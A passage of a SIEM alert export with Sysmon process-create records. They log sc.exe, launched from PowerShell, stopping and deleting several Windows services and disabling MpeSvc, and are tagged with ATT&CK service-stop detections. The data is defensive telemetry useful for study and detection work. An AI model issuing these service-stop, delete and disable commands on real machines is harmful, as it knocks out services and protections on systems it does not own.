14:19:58.491",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:30.196 +ProcessGuid: {df9fc3d3-b3d2-5ecf-0000-0010365b2b00} +ProcessId: 7672 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop wmiApSrvs +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop wmiApSrvs",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:30.200947500Z"",""eventRecordID"":""3228"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:30.196\r\nProcessGuid: {df9fc3d3-b3d2-5ecf-0000-0010365b2b00}\r\nProcessId: 7672\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: 
Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop wmiApSrvs\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:30.196"",""processGuid"":""{df9fc3d3-b3d2-5ecf-0000-0010365b2b00}"",""processId"":""7672"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop wmiApSrvs"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:58.431",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:30.099 +ProcessGuid: {df9fc3d3-b3d2-5ecf-0000-001096582b00} +ProcessId: 4240 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ALGM +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 
ALGM",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:30.123305900Z"",""eventRecordID"":""3225"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:30.099\r\nProcessGuid: {df9fc3d3-b3d2-5ecf-0000-001096582b00}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop ALGM\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:30.099"",""processGuid"":""{df9fc3d3-b3d2-5ecf-0000-001096582b00}"",""processId"":""4240"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® 
Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop ALGM"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:58.364",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:30.014 +ProcessGuid: {df9fc3d3-b3d2-5ecf-0000-0010c8562b00} +ProcessId: 4656 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete WifiService +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: 
""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete WifiService",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:30.017194500Z"",""eventRecordID"":""3223"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:30.014\r\nProcessGuid: {df9fc3d3-b3d2-5ecf-0000-0010c8562b00}\r\nProcessId: 4656\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete WifiService\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:51:30.014"",""processGuid"":""{df9fc3d3-b3d2-5ecf-0000-0010c8562b00}"",""processId"":""4656"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete WifiService"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:58.347",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:29.987 +ProcessGuid: {df9fc3d3-b3d1-5ecf-0000-0010e2552b00} +ProcessId: 8092 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WifiService +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WifiService",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:29.993262200Z"",""eventRecordID"":""3222"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:29.987\r\nProcessGuid: {df9fc3d3-b3d1-5ecf-0000-0010e2552b00}\r\nProcessId: 8092\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WifiService\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:29.987"",""processGuid"":""{df9fc3d3-b3d1-5ecf-0000-0010e2552b00}"",""processId"":""8092"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WifiService"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:58.290",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:29.932 +ProcessGuid: {df9fc3d3-b3d1-5ecf-0000-001047532b00} +ProcessId: 2028 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SRDSL +CurrentDirectory: 
C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop SRDSL",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:29.937288800Z"",""eventRecordID"":""3219"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:29.932\r\nProcessGuid: {df9fc3d3-b3d1-5ecf-0000-001047532b00}\r\nProcessId: 2028\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SRDSL\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:29.932"",""processGuid"":""{df9fc3d3-b3d1-5ecf-0000-001047532b00}"",""processId"":""2028"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SRDSL"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:58.243",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:29.880 +ProcessGuid: {df9fc3d3-b3d1-5ecf-0000-0010bf502b00} +ProcessId: 868 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) 
+Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop MpeSvc +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop MpeSvc",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:29.883606100Z"",""eventRecordID"":""3216"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:29.880\r\nProcessGuid: {df9fc3d3-b3d1-5ecf-0000-0010bf502b00}\r\nProcessId: 868\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop MpeSvc\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: 
{df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:29.880"",""processGuid"":""{df9fc3d3-b3d1-5ecf-0000-0010bf502b00}"",""processId"":""868"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop MpeSvc"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:58.224",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:29.860 
+ProcessGuid: {df9fc3d3-b3d1-5ecf-0000-0010dd4f2b00} +ProcessId: 6328 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config MpeSvc Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: 